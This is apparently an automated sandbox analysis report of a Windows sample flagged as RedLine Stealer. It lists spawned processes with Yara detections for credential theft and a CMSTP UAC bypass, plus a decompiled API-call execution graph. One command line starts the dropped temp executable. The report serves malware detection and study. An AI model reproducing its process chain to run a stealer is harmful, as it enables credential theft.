                                                                                                                                                                                                                            File size:262'432 bytes
                                                                                                                                                                                                                            MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                                            Start time:09:04:27
                                                                                                                                                                                                                            Start date:25/04/2024
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            Imagebase:0x240000
                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2204859505.0000000005A00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000011.00000002.2204859505.0000000005A00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                                            Start time:09:04:27
                                                                                                                                                                                                                            Start date:25/04/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                                            Start time:09:04:34
                                                                                                                                                                                                                            Start date:25/04/2024
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe"
                                                                                                                                                                                                                            Imagebase:0x240000
                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                                            Start time:09:04:34
                                                                                                                                                                                                                            Start date:25/04/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                                            Start time:09:04:34
                                                                                                                                                                                                                            Start date:25/04/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe"
                                                                                                                                                                                                                            Imagebase:0xab0000
                                                                                                                                                                                                                            File size:545'792 bytes
                                                                                                                                                                                                                            MD5 hash:6C93FC68E2F01C20FB81AF24470B790C
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                            • Detection: 21%, ReversingLabs
                                                                                                                                                                                                                            • Detection: 38%, Virustotal, Browse
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                                                            Start time:09:04:34
                                                                                                                                                                                                                            Start date:25/04/2024
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 2332
                                                                                                                                                                                                                            Imagebase:0x4c0000
                                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                                                            Start time:09:04:44
                                                                                                                                                                                                                            Start date:25/04/2024
                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                            Imagebase:0xcb0000
                                                                                                                                                                                                                            File size:262'432 bytes
                                                                                                                                                                                                                            MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.2204440453.0000000001102000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000019.00000002.2204440453.0000000001102000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:5.9%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:2.5%
                                                                                                                                                                                                                              Signature Coverage:12.9%
                                                                                                                                                                                                                              Total number of Nodes:1115
                                                                                                                                                                                                                              Total number of Limit Nodes:16
                                                                                                                                                                                                                              execution_graph 38413 41aed0 38418 41ac9e 38413->38418 38416 41aef8 38423 41acc9 38418->38423 38420 41aebc 38437 410905 26 API calls _Deallocate 38420->38437 38422 41ae1b 38422->38416 38430 41a222 38422->38430 38423->38423 38426 41ae12 38423->38426 38433 422bb9 46 API calls 2 library calls 38423->38433 38425 41ae5c 38425->38426 38434 422bb9 46 API calls 2 library calls 38425->38434 38426->38422 38436 412381 20 API calls _abort 38426->38436 38428 41ae7b 38428->38426 38435 422bb9 46 API calls 2 library calls 38428->38435 38438 419bf7 38430->38438 38432 41a23d 38432->38416 38433->38425 38434->38428 38435->38426 38436->38420 38437->38422 38441 419c03 CallCatchBlock 38438->38441 38439 419c11 38456 412381 20 API calls _abort 38439->38456 38441->38439 38443 419c4a 38441->38443 38442 419c16 38457 410905 26 API calls _Deallocate 38442->38457 38449 41a1d1 38443->38449 38448 419c20 __fread_nolock 38448->38432 38459 4227a8 38449->38459 38452 419c6e 38458 419c97 LeaveCriticalSection __wsopen_s 38452->38458 38456->38442 38457->38448 38458->38448 38460 4227b4 38459->38460 38461 4227cb 38459->38461 38537 412381 20 API calls _abort 38460->38537 38463 4227d3 38461->38463 38464 4227ea 38461->38464 38539 412381 20 API calls _abort 38463->38539 38541 4172ce 10 API calls 2 library calls 38464->38541 38465 4227b9 38538 410905 26 API calls _Deallocate 38465->38538 38469 4227d8 38540 410905 26 API calls _Deallocate 38469->38540 38470 4227f1 MultiByteToWideChar 38472 422820 38470->38472 38473 422810 GetLastError 38470->38473 38543 417a45 38472->38543 38542 41234b 20 API calls __dosmaperr 38473->38542 38476 41a1e7 38476->38452 38483 41a242 38476->38483 38478 422850 38481 41629a _free 20 API calls 38478->38481 38479 42282f MultiByteToWideChar 38479->38478 38480 422844 GetLastError 38479->38480 38550 41234b 20 API calls __dosmaperr 38480->38550 38481->38476 38484 41a25f 38483->38484 38485 41a274 38484->38485 38486 41a28d 38484->38486 38567 41236e 20 API calls _abort 38485->38567 38553 41e6a7 38486->38553 38489 41a292 38491 41a2b2 38489->38491 38492 41a29b 38489->38492 38490 41a279 38568 412381 20 API calls _abort 38490->38568 38566 419f10 CreateFileW 38491->38566 38569 41236e 20 API calls _abort 38492->38569 38496 41a2a0 38570 412381 20 API calls _abort 38496->38570 38498 41a368 GetFileType 38499 41a373 GetLastError 38498->38499 38500 41a3ba 38498->38500 38573 41234b 20 API calls __dosmaperr 38499->38573 38575 41e5f0 21 API calls 2 library calls 38500->38575 38501 41a33d GetLastError 38572 41234b 20 API calls __dosmaperr 38501->38572 38504 41a2eb 38504->38498 38504->38501 38571 419f10 CreateFileW 38504->38571 38505 41a381 CloseHandle 38505->38490 38507 41a3aa 38505->38507 38574 412381 20 API calls _abort 38507->38574 38509 41a330 38509->38498 38509->38501 38510 41a3db 38512 41a42e 38510->38512 38576 41a121 72 API calls 3 library calls 38510->38576 38577 419cc3 73 API calls 5 library calls 38512->38577 38513 41a3af 38513->38490 38516 41a427 38516->38512 38518 41a456 38516->38518 38517 41a44d 38519 41a465 38517->38519 38520 41a454 38517->38520 38578 4163fd 38518->38578 38523 41a544 38519->38523 38524 41a4e3 CloseHandle 38519->38524 38520->38518 38522 41a20f 38531 41629a 38522->38531 38523->38522 38593 419f10 CreateFileW 38524->38593 38526 41a50e 38526->38523 38527 41a518 GetLastError 38526->38527 38594 41234b 20 API calls __dosmaperr 38527->38594 38529 41a524 38595 41e7b9 21 API calls 2 library calls 38529->38595 38532 4162ce __dosmaperr 38531->38532 38533 4162a5 RtlFreeHeap 38531->38533 38532->38452 38533->38532 38534 4162ba 38533->38534 38623 412381 20 API calls _abort 38534->38623 38536 4162c0 GetLastError 38536->38532 38537->38465 38538->38476 38539->38469 38540->38476 38541->38470 38542->38476 38544 417a83 38543->38544 38548 417a53 _unexpected 38543->38548 38552 412381 20 API calls _abort 38544->38552 38545 417a6e RtlAllocateHeap 38547 417a81 38545->38547 38545->38548 38547->38478 38547->38479 38548->38544 38548->38545 38551 412ede 7 API calls 2 library calls 38548->38551 38550->38478 38551->38548 38552->38547 38554 41e6b3 CallCatchBlock 38553->38554 38596 4119fb EnterCriticalSection 38554->38596 38557 41e6df 38600 41e486 21 API calls 2 library calls 38557->38600 38559 41e72a __fread_nolock 38559->38489 38560 41e6ba 38560->38557 38562 41e74d EnterCriticalSection 38560->38562 38563 41e701 38560->38563 38561 41e6e4 38561->38563 38601 41e5cd EnterCriticalSection 38561->38601 38562->38563 38564 41e75a LeaveCriticalSection 38562->38564 38597 41e7b0 38563->38597 38564->38560 38566->38504 38567->38490 38568->38522 38569->38496 38570->38490 38571->38509 38572->38490 38573->38505 38574->38513 38575->38510 38576->38516 38577->38517 38603 41e84a 38578->38603 38580 416413 38616 41e7b9 21 API calls 2 library calls 38580->38616 38582 41640d 38582->38580 38583 41e84a __wsopen_s 26 API calls 38582->38583 38592 416445 38582->38592 38586 41643c 38583->38586 38584 41e84a __wsopen_s 26 API calls 38587 416451 FindCloseChangeNotification 38584->38587 38585 41646b 38591 41648d 38585->38591 38617 41234b 20 API calls __dosmaperr 38585->38617 38588 41e84a __wsopen_s 26 API calls 38586->38588 38587->38580 38589 41645d GetLastError 38587->38589 38588->38592 38589->38580 38591->38522 38592->38580 38592->38584 38593->38526 38594->38529 38595->38523 38596->38560 38602 411a43 LeaveCriticalSection 38597->38602 38599 41e7b7 38599->38559 38600->38561 38601->38563 38602->38599 38604 41e857 38603->38604 38605 41e86c 38603->38605 38618 41236e 20 API calls _abort 38604->38618 38611 41e891 38605->38611 38620 41236e 20 API calls _abort 38605->38620 38607 41e85c 38619 412381 20 API calls _abort 38607->38619 38609 41e89c 38621 412381 20 API calls _abort 38609->38621 38611->38582 38613 41e864 38613->38582 38614 41e8a4 38622 410905 26 API calls _Deallocate 38614->38622 38616->38585 38617->38591 38618->38607 38619->38613 38620->38609 38621->38614 38622->38613 38623->38536 38624 408273 38625 40828f 38624->38625 38626 4082ce 38625->38626 38627 4082db 38625->38627 38629 40831c std::_Xfsopen 29 API calls 38625->38629 38632 4082d5 38626->38632 38634 40831c 38626->38634 38629->38626 38632->38627 38640 40e228 38632->38640 38653 411d27 38634->38653 38636 4082ee 38636->38627 38637 4106ef 38636->38637 38707 41049b 38637->38707 38639 410705 38639->38632 38641 40e234 CallCatchBlock 38640->38641 38642 40e245 38641->38642 38643 40e25a 38641->38643 38787 412381 20 API calls _abort 38642->38787 38652 40e255 __fread_nolock _Xfiopen 38643->38652 38770 40e81d EnterCriticalSection 38643->38770 38645 40e24a 38788 410905 26 API calls _Deallocate 38645->38788 38648 40e276 38771 40e1b2 38648->38771 38650 40e281 38789 40e29e LeaveCriticalSection __fread_nolock 38650->38789 38652->38627 38655 411c66 CallCatchBlock 38653->38655 38654 411c80 38678 412381 20 API calls _abort 38654->38678 38655->38654 38657 411cad 38655->38657 38659 411cb2 38657->38659 38660 411cbf 38657->38660 38658 411c85 38679 410905 26 API calls _Deallocate 38658->38679 38680 412381 20 API calls _abort 38659->38680 38670 416499 38660->38670 38664 411cc8 38665 411cdc std::_Xfsopen 38664->38665 38666 411ccf 38664->38666 38682 411d10 LeaveCriticalSection __fread_nolock _Xfiopen 38665->38682 38681 412381 20 API calls _abort 38666->38681 38667 411c90 __fread_nolock 38667->38636 38671 4164a5 CallCatchBlock 38670->38671 38683 4119fb EnterCriticalSection 38671->38683 38673 4164b3 38684 416533 38673->38684 38677 4164e4 __fread_nolock 38677->38664 38678->38658 38679->38667 38680->38667 38681->38667 38682->38667 38683->38673 38688 416556 38684->38688 38685 4164c0 38698 4164ef 38685->38698 38686 4165af 38703 41704e 20 API calls 3 library calls 38686->38703 38688->38685 38688->38686 38701 40e81d EnterCriticalSection 38688->38701 38702 40e831 LeaveCriticalSection 38688->38702 38689 4165b8 38691 41629a _free 20 API calls 38689->38691 38692 4165c1 38691->38692 38692->38685 38704 4175b5 11 API calls 2 library calls 38692->38704 38694 4165e0 38705 40e81d EnterCriticalSection 38694->38705 38697 4165f3 38697->38685 38706 411a43 LeaveCriticalSection 38698->38706 38700 4164f6 38700->38677 38701->38688 38702->38688 38703->38689 38704->38694 38705->38697 38706->38700 38709 4104a7 CallCatchBlock 38707->38709 38708 4104b3 38732 412381 20 API calls _abort 38708->38732 38709->38708 38711 4104d9 38709->38711 38720 40e81d EnterCriticalSection 38711->38720 38712 4104b8 38733 410905 26 API calls _Deallocate 38712->38733 38715 4104e5 38721 4105fb 38715->38721 38717 4104f9 38734 410518 LeaveCriticalSection __fread_nolock 38717->38734 38719 4104c3 __fread_nolock 38719->38639 38720->38715 38722 41061d 38721->38722 38723 41060d 38721->38723 38735 410522 38722->38735 38748 412381 20 API calls _abort 38723->38748 38726 410612 38726->38717 38727 4106bf 38727->38717 38728 410640 _Xfiopen 38728->38727 38739 40dfcb 38728->38739 38732->38712 38733->38719 38734->38719 38736 410535 38735->38736 38738 41052e _Xfiopen 38735->38738 38737 419800 __fread_nolock 28 API calls 38736->38737 38736->38738 38737->38738 38738->38728 38740 40dfe3 38739->38740 38741 40dfdf 38739->38741 38740->38741 38749 4154e8 38740->38749 38745 419800 38741->38745 38743 40e003 38756 415fa3 62 API calls 6 library calls 38743->38756 38759 419767 38745->38759 38748->38726 38750 4154f4 38749->38750 38751 415509 38749->38751 38757 412381 20 API calls _abort 38750->38757 38751->38743 38753 4154f9 38758 410905 26 API calls _Deallocate 38753->38758 38755 415504 38755->38743 38756->38741 38757->38753 38758->38755 38760 41e84a __wsopen_s 26 API calls 38759->38760 38761 419779 38760->38761 38762 419781 38761->38762 38763 419792 SetFilePointerEx 38761->38763 38768 412381 20 API calls _abort 38762->38768 38765 419786 38763->38765 38766 4197aa GetLastError 38763->38766 38765->38727 38769 41234b 20 API calls __dosmaperr 38766->38769 38768->38765 38769->38765 38770->38648 38772 40e1d4 38771->38772 38773 40e1bf 38771->38773 38776 40dfcb _Xfiopen 62 API calls 38772->38776 38778 40e1cf _Xfiopen 38772->38778 38809 412381 20 API calls _abort 38773->38809 38775 40e1c4 38810 410905 26 API calls _Deallocate 38775->38810 38779 40e1e8 38776->38779 38778->38650 38790 4165f6 38779->38790 38782 4154e8 _Xfiopen 26 API calls 38783 40e1f6 38782->38783 38794 41637e 38783->38794 38786 41629a _free 20 API calls 38786->38778 38787->38645 38788->38652 38789->38652 38791 40e1f0 38790->38791 38792 41660c 38790->38792 38791->38782 38792->38791 38793 41629a _free 20 API calls 38792->38793 38793->38791 38795 4163a2 38794->38795 38796 41638d 38794->38796 38797 4163dd 38795->38797 38801 4163c9 38795->38801 38814 41236e 20 API calls _abort 38796->38814 38816 41236e 20 API calls _abort 38797->38816 38800 416392 38815 412381 20 API calls _abort 38800->38815 38811 416356 38801->38811 38802 4163e2 38817 412381 20 API calls _abort 38802->38817 38806 4163ea 38818 410905 26 API calls _Deallocate 38806->38818 38807 40e1fc 38807->38778 38807->38786 38809->38775 38810->38778 38819 4162d4 38811->38819 38813 41637a 38813->38807 38814->38800 38815->38807 38816->38802 38817->38806 38818->38807 38820 4162e0 CallCatchBlock 38819->38820 38830 41e5cd EnterCriticalSection 38820->38830 38822 4162ee 38823 416320 38822->38823 38824 416315 38822->38824 38831 412381 20 API calls _abort 38823->38831 38826 4163fd __wsopen_s 29 API calls 38824->38826 38827 41631b 38826->38827 38832 41634a LeaveCriticalSection __wsopen_s 38827->38832 38829 41633d __fread_nolock 38829->38813 38830->38822 38831->38827 38832->38829 38833 416ec2 38834 416ecf 38833->38834 38837 416ee7 38833->38837 38883 412381 20 API calls _abort 38834->38883 38836 416ed4 38884 410905 26 API calls _Deallocate 38836->38884 38839 416f42 38837->38839 38847 416edf 38837->38847 38885 418c55 21 API calls 2 library calls 38837->38885 38841 4154e8 _Xfiopen 26 API calls 38839->38841 38842 416f5a 38841->38842 38853 41919a 38842->38853 38844 416f61 38845 4154e8 _Xfiopen 26 API calls 38844->38845 38844->38847 38846 416f8d 38845->38846 38846->38847 38848 4154e8 _Xfiopen 26 API calls 38846->38848 38849 416f9b 38848->38849 38849->38847 38850 4154e8 _Xfiopen 26 API calls 38849->38850 38851 416fab 38850->38851 38852 4154e8 _Xfiopen 26 API calls 38851->38852 38852->38847 38854 4191a6 CallCatchBlock 38853->38854 38855 4191c6 38854->38855 38856 4191ae 38854->38856 38858 41928c 38855->38858 38863 4191ff 38855->38863 38952 41236e 20 API calls _abort 38856->38952 38959 41236e 20 API calls _abort 38858->38959 38860 4191b3 38953 412381 20 API calls _abort 38860->38953 38861 419291 38960 412381 20 API calls _abort 38861->38960 38866 419223 38863->38866 38867 41920e 38863->38867 38865 4191bb __fread_nolock 38865->38844 38886 41e5cd EnterCriticalSection 38866->38886 38954 41236e 20 API calls _abort 38867->38954 38869 41921b 38961 410905 26 API calls _Deallocate 38869->38961 38871 419229 38873 419245 38871->38873 38874 41925a 38871->38874 38872 419213 38955 412381 20 API calls _abort 38872->38955 38956 412381 20 API calls _abort 38873->38956 38887 4192ad 38874->38887 38879 41924a 38957 41236e 20 API calls _abort 38879->38957 38881 419255 38958 419284 LeaveCriticalSection __wsopen_s 38881->38958 38883->38836 38884->38847 38885->38839 38886->38871 38888 4192d7 38887->38888 38889 4192bf 38887->38889 38890 419641 38888->38890 38896 41931c 38888->38896 38971 41236e 20 API calls _abort 38889->38971 38985 41236e 20 API calls _abort 38890->38985 38893 4192c4 38972 412381 20 API calls _abort 38893->38972 38895 419646 38986 412381 20 API calls _abort 38895->38986 38897 4192cc 38896->38897 38899 419327 38896->38899 38905 419357 38896->38905 38897->38881 38973 41236e 20 API calls _abort 38899->38973 38900 419334 38987 410905 26 API calls _Deallocate 38900->38987 38902 41932c 38974 412381 20 API calls _abort 38902->38974 38906 419370 38905->38906 38907 419396 38905->38907 38910 4193b2 38905->38910 38906->38907 38908 41937d 38906->38908 38975 41236e 20 API calls _abort 38907->38975 38962 4210f9 38908->38962 38912 417a45 std::_Locinfo::_Locinfo_ctor 21 API calls 38910->38912 38911 41939b 38976 412381 20 API calls _abort 38911->38976 38915 4193c9 38912->38915 38918 41629a _free 20 API calls 38915->38918 38916 4193a2 38977 410905 26 API calls _Deallocate 38916->38977 38917 41951b 38921 419591 38917->38921 38924 419534 GetConsoleMode 38917->38924 38919 4193d2 38918->38919 38922 41629a _free 20 API calls 38919->38922 38923 419595 ReadFile 38921->38923 38925 4193d9 38922->38925 38926 419609 GetLastError 38923->38926 38927 4195af 38923->38927 38924->38921 38928 419545 38924->38928 38929 4193e3 38925->38929 38930 4193fe 38925->38930 38931 419616 38926->38931 38932 41956d 38926->38932 38927->38926 38933 419586 38927->38933 38928->38923 38934 41954b ReadConsoleW 38928->38934 38978 412381 20 API calls _abort 38929->38978 38938 419800 __fread_nolock 28 API calls 38930->38938 38983 412381 20 API calls _abort 38931->38983 38950 4193ad __fread_nolock 38932->38950 38980 41234b 20 API calls __dosmaperr 38932->38980 38945 4195d4 38933->38945 38946 4195eb 38933->38946 38933->38950 38934->38933 38939 419567 GetLastError 38934->38939 38935 41629a _free 20 API calls 38935->38897 38938->38908 38939->38932 38940 4193e8 38979 41236e 20 API calls _abort 38940->38979 38941 41961b 38984 41236e 20 API calls _abort 38941->38984 38981 418fc9 31 API calls 2 library calls 38945->38981 38947 419602 38946->38947 38946->38950 38982 418e09 29 API calls __fread_nolock 38947->38982 38950->38935 38951 419607 38951->38950 38952->38860 38953->38865 38954->38872 38955->38869 38956->38879 38957->38881 38958->38865 38959->38861 38960->38869 38961->38865 38963 421106 38962->38963 38965 421113 38962->38965 38988 412381 20 API calls _abort 38963->38988 38967 42111f 38965->38967 38989 412381 20 API calls _abort 38965->38989 38966 42110b 38966->38917 38967->38917 38969 421140 38990 410905 26 API calls _Deallocate 38969->38990 38971->38893 38972->38897 38973->38902 38974->38900 38975->38911 38976->38916 38977->38950 38978->38940 38979->38950 38980->38950 38981->38950 38982->38951 38983->38941 38984->38950 38985->38895 38986->38900 38987->38897 38988->38966 38989->38969 38990->38966 38991 409385 38992 409391 CallCatchBlock 38991->38992 39023 40959e 38992->39023 38994 409398 38995 4094eb 38994->38995 38998 4093c2 38994->38998 39129 409a73 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 38995->39129 38997 4094f2 39120 413b51 38997->39120 39009 409401 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 38998->39009 39123 413876 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 38998->39123 39003 4093db 39005 4093e1 39003->39005 39124 41381a 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 39003->39124 39007 409462 39034 409b8d 39007->39034 39009->39007 39125 40e677 39 API calls 4 library calls 39009->39125 39024 4095a7 39023->39024 39131 409d1b IsProcessorFeaturePresent 39024->39131 39026 4095b3 39132 40c90d 10 API calls 3 library calls 39026->39132 39028 4095b8 39029 4095bc 39028->39029 39133 415329 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 39028->39133 39029->38994 39031 4095c5 39032 4095d3 39031->39032 39134 40c936 8 API calls 3 library calls 39031->39134 39032->38994 39135 40b740 39034->39135 39037 409468 39038 4137c7 39037->39038 39137 41e091 39038->39137 39040 409471 39043 424a0e 39040->39043 39041 4137d0 39041->39040 39141 41e39b 38 API calls 39041->39141 39044 424a1e _Xfiopen 39043->39044 39143 401b1e 39044->39143 39046 424a4c 39146 403498 39046->39146 39051 401b1e 27 API calls 39052 424aac 39051->39052 39153 4265bc 39052->39153 39055 401b1e 27 API calls 39056 424ac5 GetModuleFileNameA 39055->39056 39057 401b1e 27 API calls 39056->39057 39058 424aee 39057->39058 39173 42604a 39058->39173 39060 424afe 39061 4252ab 39060->39061 39063 401b1e 27 API calls 39060->39063 39062 401b1e 27 API calls 39061->39062 39064 425482 39062->39064 39066 424f72 39063->39066 39277 40356f 39064->39277 39192 4034e3 39066->39192 39068 42549f 39069 42676c 63 API calls 39068->39069 39076 425526 39069->39076 39070 424f9c 39200 42676c 39070->39200 39072 4250db 39263 42615a 39072->39263 39077 42676c 63 API calls 39076->39077 39082 42588a ___scrt_fastfail 39077->39082 39078 425fc0 39313 4019f8 26 API calls 39078->39313 39082->39078 39285 426582 39082->39285 39088 401b1e 27 API calls 39089 425924 39088->39089 39291 426510 39089->39291 39091 425929 39092 42676c 63 API calls 39091->39092 39095 425b35 ___scrt_fastfail 39092->39095 39093 425fb4 39312 4019f8 26 API calls 39093->39312 39096 426582 51 API calls 39095->39096 39108 425cfd 39095->39108 39097 425ba4 ___scrt_fastfail 39096->39097 39098 426582 51 API calls 39097->39098 39099 425bc7 ___scrt_fastfail 39098->39099 39099->39099 39100 426242 3 API calls 39099->39100 39101 425cbb 39100->39101 39102 425cc0 CreateDirectoryA 39101->39102 39101->39108 39298 42628b 39102->39298 39104 425ce2 39105 401b1e 27 API calls 39104->39105 39104->39108 39106 425cf8 39105->39106 39107 426510 29 API calls 39106->39107 39107->39108 39108->39093 39109 42676c 63 API calls 39108->39109 39111 425eff ___scrt_fastfail 39109->39111 39112 426582 51 API calls 39111->39112 39116 425f9b 39111->39116 39113 425f6d 39112->39113 39114 426242 3 API calls 39113->39114 39115 425f7f 39114->39115 39115->39116 39117 401b1e 27 API calls 39115->39117 39311 4019f8 26 API calls 39116->39311 39118 425f96 39117->39118 39119 426510 29 API calls 39118->39119 39119->39116 39792 4138ce 39120->39792 39123->39003 39124->39009 39125->39007 39129->38997 39131->39026 39132->39028 39133->39031 39134->39029 39136 409ba0 GetStartupInfoW 39135->39136 39136->39037 39138 41e09a 39137->39138 39139 41e0a3 39137->39139 39142 41df90 51 API calls 5 library calls 39138->39142 39139->39041 39141->39041 39142->39139 39314 402c50 39143->39314 39147 4034c0 39146->39147 39148 4034d9 39146->39148 39147->39148 39323 40e509 46 API calls 39147->39323 39150 401b52 39148->39150 39324 402d13 39150->39324 39152 401b68 39152->39051 39154 4265c6 __EH_prolog 39153->39154 39357 403e0c 39154->39357 39156 4265ea 39156->39156 39157 402c71 27 API calls 39156->39157 39158 42664f 39157->39158 39371 404097 39158->39371 39160 4266fe 39164 42671a std::ios_base::_Ios_base_dtor 39160->39164 39388 40387f 26 API calls 2 library calls 39160->39388 39163 4266d6 39167 402c50 27 API calls 39163->39167 39384 402bef 39164->39384 39165 402c71 27 API calls 39165->39163 39169 4266f6 39167->39169 39171 402bef 26 API calls 39169->39171 39170 402bef 26 API calls 39172 424ab8 39170->39172 39171->39160 39172->39055 39174 426054 __EH_prolog 39173->39174 39535 401bb2 39174->39535 39179 4260b3 39551 401a16 39179->39551 39180 426097 39572 401b6f 39180->39572 39183 4260c0 39554 4024a1 39183->39554 39187 4260aa std::ios_base::_Ios_base_dtor 39187->39060 39190 42610e 39191 401b6f 68 API calls 39190->39191 39191->39187 39193 4034ed __EH_prolog 39192->39193 39723 401056 39193->39723 39195 403513 39196 401056 50 API calls 39195->39196 39197 403542 39196->39197 39727 40399f 39197->39727 39199 403553 39199->39070 39201 426776 __EH_prolog 39200->39201 39202 401b1e 27 API calls 39201->39202 39203 426b3f 39202->39203 39765 401aa1 39203->39765 39205 426b55 39206 401aa1 27 API calls 39205->39206 39207 426bdc 39206->39207 39208 401aa1 27 API calls 39207->39208 39209 426be9 39208->39209 39210 401aa1 27 API calls 39209->39210 39211 426c4c 39210->39211 39212 401aa1 27 API calls 39211->39212 39213 426c5d 39212->39213 39214 401aa1 27 API calls 39213->39214 39215 426c6a 39214->39215 39216 401aa1 27 API calls 39215->39216 39217 426d15 39216->39217 39218 401aa1 27 API calls 39217->39218 39219 42700c 39218->39219 39220 401aa1 27 API calls 39219->39220 39221 4272bb 39220->39221 39222 401aa1 27 API calls 39221->39222 39247 4272c8 39222->39247 39223 4273e4 39224 401aa1 27 API calls 39223->39224 39225 4273f1 WSAStartup 39224->39225 39226 42740b socket 39225->39226 39248 427642 39225->39248 39227 427423 39226->39227 39228 427438 39226->39228 39229 42742c WSACleanup 39227->39229 39230 427440 gethostbyname 39228->39230 39233 4277f3 